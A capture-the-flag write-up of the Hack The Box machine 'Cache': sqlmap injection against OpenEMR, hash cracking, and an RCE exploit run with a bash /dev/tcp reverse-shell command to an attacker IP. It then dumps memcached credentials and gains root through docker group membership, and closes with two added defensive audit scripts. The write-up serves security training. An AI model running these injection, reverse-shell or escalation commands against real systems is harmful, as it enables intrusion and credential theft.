
Cache Writeup [HTB]

Cache is a Linux machine rated medium on Hack The Box. It consists of enumerating the web server to find a second site running OpenEMR, pivoting to a user with credentials obtained from the initial site, and finally obtaining root by reading credentials out of memcached and abusing docker group privileges.

Enumeration

Running nmap:

```shell
nmap -sC -sV 10.10.10.188
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-04 15:41 CEST
Nmap scan report for 10.10.10.188
Host is up (0.17s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 a9:2d:b2:a0:c4:57:e7:7c:35:2d:45:4d:db:80:8c:f1 (RSA)
|   256 bc:e4:16:3d:2a:59:a1:3a:6a:09:28:dd:36:10:38:08 (ECDSA)
|_  256 57:d5:47:ee:07:ca:3a:c0:fd:9b:a8:7f:6b:4c:9d:7c (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Cache
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Browsing to port 80 we find the site's landing page.

There is a login page but we do not have credentials. Inspecting the page source, a jQuery function is visible that contains the credentials hard-coded in client-side JavaScript.

We can log in, but it is a rabbit hole.

Then, enumerating the web further, we find an about page which mentions that the author has another project called hms. We can add it to /etc/hosts as hms.htb.

Visiting it, we discover it is running OpenEMR.

Exploitation

I found a YouTube PoC exploit for it.

Following the PoC, I create a user and then save the following request:

```shell
cat request.txt
GET /portal/add_edit_event_user.php?eid=1 HTTP/1.1
Host: hms.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: OpenEMR=nc6uq0oms8l5hcqja5cg7fkpul; PHPSESSID=q7ftl9ojp1vaej54d4esd4phlo
Upgrade-Insecure-Requests: 1
```

Using sqlmap with the saved request, the databases can be enumerated:

```shell
sqlmap -r request.txt --threads=10 --dbs
available databases [2]
[*] information_schema
[*] openemr
```

Now we dump the tables:

```shell
sqlmap -r request.txt --threads=10 -D openemr --tables
user_settings
| users
| users_facility
| users_secure
```

users_secure seems to be the table we are looking for, so we dump its contents:

```shell
sqlmap -r request.txt --threads=10 -D openemr -T users_secure --dump
```

From it we obtain the user openemr_admin and a bcrypt password hash: $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B. Note the low cost factor (05, i.e. 2^5 rounds), which is why a wordlist attack against it finishes quickly.

This hash can be cracked with john:

```shell
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
john --show hash.txt
?:xxxxxx
1 password hash cracked, 0 left
```

Now that we have credentials, we can use the following RCE exploit to obtain a reverse shell: <https://www.exploit-db.com/exploits/45161>

```shell
python openemr.py http://hms.htb -u openemr_admin -p xxxxxx -c 'bash -i >& /dev/tcp/10.10.14.46/443 0>&1'
.---.  ,---.  ,---.  .-. .-.,---.          ,---.
/ .-. ) | .-.\ | .-'  |  \| || .-'  |\    /|| .-.\
| | |(_)| |-' )| `-.  |   | || `-.  |(\  / || `-'/
| | | | | |--' | .-'  | |\  || .-'  (_)\/  ||   (
\ `-' / | |    |  `--.| | |)||  `--.| \  / || |\ \
 )---'  /(     /( __.'/(  (_)/( __.'| |\/| ||_| \)\
(_)    (__)   (__)   (__)   (__)    '-'  '-'    (__)

  ={   P R O J E C T    I N S E C U R I T Y   }=

        Twitter : @Insecurity
        Site    : insecurity.sh

[$] Authenticating with openemr_admin:xxxxxx
[$] Injecting payload
```

And we obtain a reverse shell as www-data:

```shell
nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.46] from (UNKNOWN) [10.10.10.188] 36386
bash: cannot set terminal process group (1811): Inappropriate ioctl for device
bash: no job control in this shell
www-data@cache:/var/www/hms.htb/public_html/interface/main$ whoami
www-data
```

User ash exists on the system, so we can su to it with the credentials found in the website source:

```shell
www-data@cache:/home$ su ash
Password:
ash@cache:/home$ whoami
ash
```

Privilege Escalation

Listing locally listening services shows port 11211 open:

```shell
ash@cache:/home$ ss -tnl
State    Recv-Q    Send-Q        Local Address:Port        Peer Address:Port
LISTEN   0         80                127.0.0.1:3306             0.0.0.0:*
LISTEN   0         128               127.0.0.1:11211            0.0.0.0:*
LISTEN   0         128           127.0.0.53%lo:53               0.0.0.0:*
LISTEN   0         128                 0.0.0.0:22               0.0.0.0:*
LISTEN   0         128                       *:80                     *:*
LISTEN   0         128                    [::]:22                  [::]:*
```

This port corresponds to memcached. It accepts commands without any authentication, so although it is bound to localhost, any local user can dump the cached data.

We can connect to it through telnet:

```shell
ash@cache:/home$ telnet localhost 11211
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.

stats cachedump 1 0
ITEM link [21 b; 0 s]
ITEM user [5 b; 0 s]
ITEM passwd [9 b; 0 s]
ITEM file [7 b; 0 s]
ITEM account [9 b; 0 s]
END
```

Then, we can retrieve the user and password:

```shell
get user
VALUE user 0 5
luffy
END
get passwd
VALUE passwd 0 9
0n3_p1ec3
END
```
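As an added example (not part of the original writeup), the following shell helper parses a `stats cachedump` listing like the one above and flags key names that look like they hold credentials, so an administrator can audit what an application is putting into memcached. The sample listing is constructed to mirror the output above, and the function names and the credential-word list are my own choices; it is a coarse substring heuristic, so expect some false positives.

```shell
#!/bin/sh
# Audit helper for memcached "stats cachedump" output (added example, not from
# the original writeup). It only parses text; feed it the real listing by
# running the same "stats cachedump" command shown above and piping the result.

# Constructed sample, mirroring the listing obtained in the writeup.
SAMPLE_CACHEDUMP='ITEM link [21 b; 0 s]
ITEM user [5 b; 0 s]
ITEM passwd [9 b; 0 s]
ITEM file [7 b; 0 s]
ITEM account [9 b; 0 s]
END'

# Print "key size_in_bytes" for every ITEM line read from stdin.
cachedump_items() {
    awk '$1 == "ITEM" { gsub(/\[/, "", $3); print $2, $3 }'
}

# Print only keys whose (lower-cased) name contains a credential-ish word.
# Heuristic word list chosen for this example; tune it to your application.
cachedump_sensitive() {
    cachedump_items \
        | awk 'tolower($1) ~ /(user|pass|secret|token|key|account|cred)/ { print $1 }'
}

# Number of credential-looking keys in the constructed sample.
audit_sample() {
    printf '%s\n' "$SAMPLE_CACHEDUMP" | cachedump_sensitive | wc -l | tr -d ' '
}

# Stand-alone run: report the suspicious keys in the sample.
printf 'credential-looking keys: %s\n' "$(printf '%s\n' "$SAMPLE_CACHEDUMP" | cachedump_sensitive | tr '\n' ' ')"
```

Any key this reports is stored and served in cleartext to whoever can reach the port, so the fix is on the application side (do not cache secrets) and on the service side (restrict access to the socket, or enable authentication), not in the parser.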

With these credentials we can log in as luffy via ssh:

```shell
ssh luffy@10.10.10.188
```

After logging in we see that user luffy belongs to the docker group:

```shell
luffy@cache:~$ id
uid=1001(luffy) gid=1001(luffy) groups=1001(luffy),999(docker)
```

A root shell can be obtained by following GTFOBins, since any member of the docker group can mount the host filesystem into a container and chroot into it:

```shell
luffy@cache:~$ docker run -v /:/mnt --rm -it ubuntu chroot /mnt sh
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
```
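Because docker group membership is root-equivalent, as the `docker run` above demonstrates, it is worth checking for on every host. The following shell helper is an added example (not part of the original writeup) that lists docker group members from a group(5)-format file and fails if there are any, so it can gate a hardening check. The sample group file is constructed to match the `id` output above; the function names are my own.

```shell
#!/bin/sh
# Docker group audit (added example, not from the original writeup).
# Reads a group(5)-format file (default /etc/group) and reports members of the
# "docker" group, which can become root on the host as shown in the writeup.

# Constructed sample group file, matching the uid/gid values seen above.
SAMPLE_GROUP='root:x:0:
sudo:x:27:ash
docker:x:999:luffy,ash
luffy:x:1001:'

# Usage: docker_group_members [group_file]; prints one member per line.
docker_group_members() {
    awk -F: '$1 == "docker" {
        n = split($4, m, ",")
        for (i = 1; i <= n; i++) if (m[i] != "") print m[i]
    }' "${1:-/etc/group}"
}

# Usage: docker_group_check [group_file]; exit status 1 if any member exists,
# so the function can be used directly as a pass/fail hardening check.
docker_group_check() {
    members=$(docker_group_members "${1:-/etc/group}" | tr '\n' ' ')
    if [ -n "$members" ]; then
        printf 'FAIL: root-equivalent docker group members: %s\n' "$members"
        return 1
    fi
    printf 'OK: docker group has no members\n'
    return 0
}

# Stand-alone run against the constructed sample (expected to report FAIL).
tmp=$(mktemp)
printf '%s\n' "$SAMPLE_GROUP" > "$tmp"
docker_group_check "$tmp" || true
rm -f "$tmp"
```

Run it without arguments to audit the live /etc/group. Note that it only covers supplementary membership listed in the group file; a user whose primary GID is the docker group would show up in /etc/passwd instead, and the same root-equivalence applies to anyone who can reach the Docker socket by other means.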
This post is licensed under CC BY 4.0 by the author.